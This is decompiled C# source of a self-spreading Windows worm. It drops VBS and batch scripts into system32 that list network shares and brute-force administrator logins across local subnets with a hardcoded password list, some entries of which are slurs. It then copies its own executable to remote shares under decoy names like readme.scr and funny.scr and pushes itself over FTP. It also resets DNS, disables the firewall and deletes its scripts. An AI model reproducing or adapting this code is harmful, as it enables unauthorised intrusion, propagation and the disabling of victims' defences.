using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Windows.Forms;
using Microsoft.VisualBasic.CompilerServices;
using ns2;

namespace ns3;

internal sealed class Class13
{
	public static void smethod_0()
	{
		try
		{
			IPHostEntry hostByName = Dns.GetHostByName(Dns.GetHostName());
			string text = hostByName.AddressList.GetValue(0)!.ToString();
			Array array = text.Split(new char[1] { '.' });
			FileStream stream = new FileStream("C:\\windows\\system32\\net.vbs", FileMode.Create, FileAccess.Write);
			StreamWriter streamWriter = new StreamWriter(stream);
			streamWriter.BaseStream.Seek(0L, SeekOrigin.End);
			streamWriter.WriteLine("strComputer =\".\"");
			streamWriter.WriteLine("Set objWMIService = GetObject(\"winmgmts:\"_ ");
			streamWriter.WriteLine("& \"{impersonationLevel=impersonate}!\\\\\" & strComputer & \"\\root\\cimv2\")");
			streamWriter.WriteLine("Set colShares = objWMIService.ExecQuery(\"Select * from Win32_Share\")");
			streamWriter.WriteLine("For each objShare in colShares ");
			streamWriter.WriteLine("Stuff = objShare.Path ");
			streamWriter.WriteLine("Set myFSO = CreateObject(\"Scripting.FileSystemObject\") ");
			streamWriter.WriteLine("Set WriteStuff = myFSO.OpenTextFile(\"C:\\windows\\system32\\logg.txt\", 8, True)");
			streamWriter.WriteLine("WriteStuff.WriteLine(Stuff) ");
			streamWriter.WriteLine("WriteStuff.Close ");
			streamWriter.WriteLine("SET WriteStuff = NOTHING ");
			streamWriter.WriteLine("Next ");
			streamWriter.Close();
			FileStream stream2 = new FileStream("C:\\windows\\system32\\launch.vbs", FileMode.Create, FileAccess.Write);
			StreamWriter streamWriter2 = new StreamWriter(stream2);
			streamWriter2.BaseStream.Seek(0L, SeekOrigin.End);
			streamWriter2.WriteLine("Dim oShell");
			streamWriter2.WriteLine("Set oShell = WScript.CreateObject (\"WScript.Shell\")");
			streamWriter2.WriteLine("oShell.run \"C:\\windows\\system32\\launch.bat\",0,True");
			streamWriter2.WriteLine("Set oShell = Nothing ");
			streamWriter2.Close();
			Process.Start("C:\\windows\\system32\\net.vbs");
			Class7.Sleep(5000L);
			FileStream stream3 = new FileStream("C:\\windows\\system32\\launch.bat", FileMode.Create, FileAccess.Write);
			StreamWriter streamWriter3 = new StreamWriter(stream3);
			streamWriter3.BaseStream.Seek(0L, SeekOrigin.End);
			streamWriter3.WriteLine("@echo off & break off");
			streamWriter3.WriteLine("for /f %%t in (C:\\windows\\system32\\logg.txt) do (");
			streamWriter3.WriteLine("copy " + Application.get_ExecutablePath() + " %%t\\readme.scr ");
			streamWriter3.WriteLine(")");
			streamWriter3.WriteLine("echo 123 >%windir%\\tam.dll");
			streamWriter3.WriteLine("echo homepc >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo myhomepc >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo myhomecomputer >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo fuck >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo shit >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo piss >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo dont >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo bla >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo bla123 >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo lol123 >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo lol >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo xD >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo !\"§$ >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo %username% >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo jew >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo %computername% >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo %userdomain% >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo ass >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo omg >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo omfg >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo bruns >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo john >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo tom >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo kevin >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo me >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo love >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo root >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo admin >>%windir%\\tam.dll");
			streamWriter3.WriteLine("echo administrator >>%windir%\\tam.dll");
			streamWriter3.WriteLine("set num=0");
			streamWriter3.WriteLine("ping 192.168.1.%num% -n 1");
			streamWriter3.WriteLine("ping 192.168.2.%num% -n 1");
			streamWriter3.WriteLine(":loop");
			streamWriter3.WriteLine("for /f %%k in (%windir%\\tam.dll) do ( ");
			streamWriter3.WriteLine("net use 192.168.1.%num% /user:administrator %%k ");
			streamWriter3.WriteLine("net use 192.168.1.%num% /user:admin %%k ");
			streamWriter3.WriteLine("net use 192.168.2.%num% /user:administrator %%k ");
			streamWriter3.WriteLine("net use 192.168.2.%num% /user:admin %%k ");
			streamWriter3.WriteLine("net use 192.168.2.%num% /user:%username% %%k ");
			streamWriter3.WriteLine("net use 192.168.1.%num% /user:%username% %%k ");
			streamWriter3.WriteLine("net use 192.168.2.%num% /user:%username% \" \" ");
			streamWriter3.WriteLine("net use 192.168.1.%num% /user:%username% \" \" ");
			streamWriter3.WriteLine("copy " + Application.get_ExecutablePath() + " \\\\192.168.1.%num%\\C$\\funny.scr");
			streamWriter3.WriteLine("copy " + Application.get_ExecutablePath() + " \\\\192.168.2.%num%\\C$\\funny.scr");
			streamWriter3.WriteLine("copy " + Application.get_ExecutablePath() + " \\\\192.168.1.%num%\\IPC$\\funny.scr");
			streamWriter3.WriteLine("copy " + Application.get_ExecutablePath() + " \\\\192.168.2.%num%\\IPC$\\funny.scr");
			streamWriter3.WriteLine("copy " + Application.get_ExecutablePath() + " \\\\192.168.1.%num%\\Admin$\\funny.scr");
			streamWriter3.WriteLine("copy " + Application.get_ExecutablePath() + " \\\\192.168.2.%num%\\Admin$\\funny.scr");
			streamWriter3.WriteLine("copy " + Application.get_ExecutablePath() + " \\\\192.168.1.%num%\\d$\\funny.scr");
			streamWriter3.WriteLine("copy " + Application.get_ExecutablePath() + " \\\\192.168.2.%num%\\d$\\funny.scr");
			streamWriter3.WriteLine("copy " + Application.get_ExecutablePath() + " \\\\192.168.1.%num%\\print$\\funny.scr");
			streamWriter3.WriteLine("copy " + Application.get_ExecutablePath() + " \\\\192.168.2.%num%\\print$\\funny.scr");
			streamWriter3.WriteLine("for /f \"tokens=1 delims= \" %%a in ('net view \\\\192.168.1.%num% ^| find \" \" ') do echo %%a >>%windir%\\input%num%.blp");
			streamWriter3.WriteLine("for /f %%v in (input%num%.blp) do (");
			streamWriter3.WriteLine("copy " + Application.get_ExecutablePath() + " \\\\192.168.1.%num%\\%%v\\LOOL.pif");
			streamWriter3.WriteLine(")");
			streamWriter3.WriteLine(")");
			streamWriter3.WriteLine("set /a num=%num%+1");
			streamWriter3.WriteLine("if not %num%==255 goto loop");
			streamWriter3.WriteLine("If exist %appdata%\\mirc del %appdata%\\mIRC\\mirc.ini");
			streamWriter3.WriteLine("set /a ran0=%random%%%9+1");
			streamWriter3.WriteLine("del /f %windir%\\*.blp");
			streamWriter3.WriteLine("for /f \"tokens=1 delims= \" %%f in ('net view ^| find \" \" ') do echo %%f >>%windir%\\teest.txt");
			streamWriter3.WriteLine("for /f %%g in (%windir%\\teest.txt) do (");
			streamWriter3.WriteLine("for /f %%k in (%windir%\\tam.dll) do ( ");
			streamWriter3.WriteLine("net use %%g /user:admin %%k ");
			streamWriter3.WriteLine("net use %%g /user:administrator %%k ");
			streamWriter3.WriteLine(")");
			streamWriter3.WriteLine("net use %%g /user:admin \" \"");
			streamWriter3.WriteLine("copy " + Application.get_ExecutablePath() + " %%g\\d$\\funny.scr");
			streamWriter3.WriteLine("copy " + Application.get_ExecutablePath() + " %%g\\c$\\funny.scr");
			streamWriter3.WriteLine("copy " + Application.get_ExecutablePath() + " %%g\\IPC$\\funny.scr");
			streamWriter3.WriteLine("copy " + Application.get_ExecutablePath() + " %%g\\Admin$\\funny.scr");
			streamWriter3.WriteLine("copy " + Application.get_ExecutablePath() + " %%g\\print$\\funny.scr");
			streamWriter3.WriteLine("for /f \"tokens=1 delims= \" %%a in ('net view %%g ^| find \" \" ') do echo %%a >>%windir%\\input123.blp");
			streamWriter3.WriteLine("for /f %%v in (input123.blp) do (");
			streamWriter3.WriteLine("copy " + Application.get_ExecutablePath() + " %%g\\%%v\\STUPID.scr");
			streamWriter3.WriteLine("copy " + Application.get_ExecutablePath() + " %%g\\%%v\\%%v.scr");
			streamWriter3.WriteLine(")");
			streamWriter3.WriteLine(")");
			streamWriter3.WriteLine("set varr=0");
			streamWriter3.WriteLine(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject((object)"set ips=", NewLateBinding.LateIndexGet((object)array, new object[1] { 0 }, (string[])null)), (object)"."), NewLateBinding.LateIndexGet((object)array, new object[1] { 1 }, (string[])null)), (object)"."), NewLateBinding.LateIndexGet((object)array, new object[1] { 2 }, (string[])null)), (object)"."));
			streamWriter3.WriteLine(":looop");
			streamWriter3.WriteLine("set /a varr=%varr%+1");
			streamWriter3.WriteLine("ping %ips%%varr% -n 3");
			streamWriter3.WriteLine("if %errorlevel%==0 (");
			streamWriter3.WriteLine("for /f %%k in (%windir%\\tam.dll) do ( ");
			streamWriter3.WriteLine("net use %ips%%varr% /user:administrator %%k ");
			streamWriter3.WriteLine("net use %ips%%varr% /user:admin %%k ");
			streamWriter3.WriteLine("net use %ips%%varr% /user:administrator %%k ");
			streamWriter3.WriteLine("net use %ips%%varr% /user:admin %%k ");
			streamWriter3.WriteLine("net use %ips%%varr% /user:%username% %%k ");
			streamWriter3.WriteLine("net use %ips%%varr% /user:%username% %%k ");
			streamWriter3.WriteLine("net use %ips%%varr% /user:%username% \" \" ");
			streamWriter3.WriteLine("net use %ips%%varr% /user:%username% \" \" ");
			streamWriter3.WriteLine(")");
			streamWriter3.WriteLine("net use %ips%%varr%\\IPC$");
			streamWriter3.WriteLine("net use %ips%%varr%\\C$");
			streamWriter3.WriteLine("net use %ips%%varr%\\D$");
			streamWriter3.WriteLine("net use %ips%%varr%\\admin$");
			streamWriter3.WriteLine("net use %ips%%varr%\\print$");
			streamWriter3.WriteLine("net use %ips%%varr%\\IPC$");
			streamWriter3.WriteLine("for /f \"tokens=1 delims= \" %%a in ('net view \\\\%ips%%varr% ^| find \" \" ') do echo %%a >>%windir%\\%var%.blp");
			streamWriter3.WriteLine("copy " + Application.get_ExecutablePath() + " %ips%%varr%\\IPC$\\README.scr");
			streamWriter3.WriteLine("copy " + Application.get_ExecutablePath() + " %ips%%varr%\\C$\\README.scr");
			streamWriter3.WriteLine("copy " + Application.get_ExecutablePath() + " %ips%%varr%\\D$\\README.scr");
			streamWriter3.WriteLine("copy " + Application.get_ExecutablePath() + " %ips%%varr%\\admin$\\README.scr");
			streamWriter3.WriteLine("copy " + Application.get_ExecutablePath() + " %ips%%varr%\\print$\\README.scr");
			streamWriter3.WriteLine("for /F %%q in (%windir%\\%var%.blp) do (");
			streamWriter3.WriteLine("copy " + Application.get_ExecutablePath() + " %ips%%varr%\\%%q\\INSTALL.scr");
			streamWriter3.WriteLine("del /f %windir%\\%var%.blp");
			streamWriter3.WriteLine(")");
			streamWriter3.WriteLine("if not %varr%==255 goto looop");
			streamWriter3.WriteLine("echo Function MyIP_XMLHTTP( )>wan.vbs");
			streamWriter3.WriteLine("echo     Dim objRequest, strURL >>wan.vbs");
			streamWriter3.WriteLine("echo MyIP_XMLHTTP = \"0.0.0.0\" >> wan.vbs");
			streamWriter3.WriteLine("echo strURL = \"http://www.whatismyip.com/automation/n09230945.asp\" >> wan.vbs");
			streamWriter3.WriteLine("echo     Set objRequest = CreateObject( \"Microsoft.XMLHTTP\" ) >>wan.vbs");
			streamWriter3.WriteLine("echo     objRequest.open \"GET\", strURL, False >>wan.vbs");
			streamWriter3.WriteLine("echo     objRequest.send vbNull >>wan.vbs");
			streamWriter3.WriteLine("echo     If objRequest.status = 200 Then MyIP_XMLHTTP = objRequest.responseText >>wan.vbs");
			streamWriter3.WriteLine("echo     Set objRequest = Nothing >>wan.vbs");
			streamWriter3.WriteLine("echo End Function >>wan.vbs");
			streamWriter3.WriteLine("echo ret = MyIP_XMLHTTP() >> wan.vbs)");
			streamWriter3.WriteLine("echo Set FSys = CreateObject(\"Scripting.FileSystemObject\") >>wan.vbs");
			streamWriter3.WriteLine("echo Set MonFic = FSys.CreateTextFile(\"00001.tmp\") >>wan.vbs");
			streamWriter3.WriteLine("echo With MonFic >>wan.vbs");
			streamWriter3.WriteLine("echo.writeLine(ret >> wan.vbs)");
			streamWriter3.WriteLine("echo End With >>wan.vbs");
			streamWriter3.WriteLine("Call wan.vbs()");
			streamWriter3.WriteLine("set /p wan=<00001.tmp");
			streamWriter3.WriteLine("del /f %windir%\\input123.blp");
			streamWriter3.WriteLine("del /f %windir%\\teest.txt");
			streamWriter3.WriteLine("echo open %wan% >%windir%\\ftp");
			streamWriter3.WriteLine("anonymous >>%windir%\\ftp");
			streamWriter3.WriteLine("password >>%windir%\\ftp");
			streamWriter3.WriteLine("put " + Application.get_ExecutablePath() + " >>%windir%\\ftp");
			streamWriter3.WriteLine("echo by >>%windir%\\ftp");
			streamWriter3.WriteLine("ftp -s:%windir%\\ftp");
			streamWriter3.WriteLine("del %windir%\\ftp");
			streamWriter3.WriteLine("echo open 192.168.1.%bloo% >%windir%\\ftp");
			streamWriter3.WriteLine("anonymous >>%windir%\\ftp");
			streamWriter3.WriteLine("password >>%windir%\\ftp");
			streamWriter3.WriteLine("put " + Application.get_ExecutablePath() + " >>%windir%\\ftp");
			streamWriter3.WriteLine("echo by >>%windir%\\ftp");
			streamWriter3.WriteLine("ftp -s:%windir%\\ftp");
			streamWriter3.WriteLine("del %windir%\\ftp");
			streamWriter3.WriteLine("echo open 192.168.1.%bloo% >%windir%\\ftp");
			streamWriter3.WriteLine("anonymous >>%windir%\\ftp");
			streamWriter3.WriteLine("pwd >>%windir%\\ftp");
			streamWriter3.WriteLine("put " + Application.get_ExecutablePath() + " >>%windir%\\ftp");
			streamWriter3.WriteLine("echo by >>%windir%\\ftp");
			streamWriter3.WriteLine("ftp -s:%windir%\\ftp");
			streamWriter3.WriteLine("del %windir%\\ftp");
			streamWriter3.WriteLine("echo open 192.168.1.%bloo% >%windir%\\ftp");
			streamWriter3.WriteLine("%username% >>%windir%\\ftp");
			streamWriter3.WriteLine("password >>%windir%\\ftp");
			streamWriter3.WriteLine("put " + Application.get_ExecutablePath() + " >>%windir%\\ftp");
			streamWriter3.WriteLine("echo by >>%windir%\\ftp");
			streamWriter3.WriteLine("ftp -s:%windir%\\ftp");
			streamWriter3.WriteLine("del %windir%\\ftp");
			streamWriter3.WriteLine("netsh interface ip set dns *  static 216.146.35.35,216.146.36.36");
			streamWriter3.WriteLine("netsh firewall set opmode mode=disable");
			streamWriter3.Close();
			Class7.Sleep(100000L);
			Process.Start(" C:\\windows\\system32\\launch.vbs");
			Class7.Sleep(10000L);
			FileInfo fileInfo = new FileInfo("C:\\windows\\system32\\launch.vbs");
			fileInfo.Delete();
			FileInfo fileInfo2 = new FileInfo("C:\\windows\\system32\\launch.bat");
			fileInfo2.Delete();
			FileInfo fileInfo3 = new FileInfo("C:\\windows\\system32\\net.vbs");
			fileInfo3.Delete();
		}
		catch (Exception projectError)
		{
			ProjectData.SetProjectError(projectError);
			ProjectData.ClearProjectError();
		}
	}
}
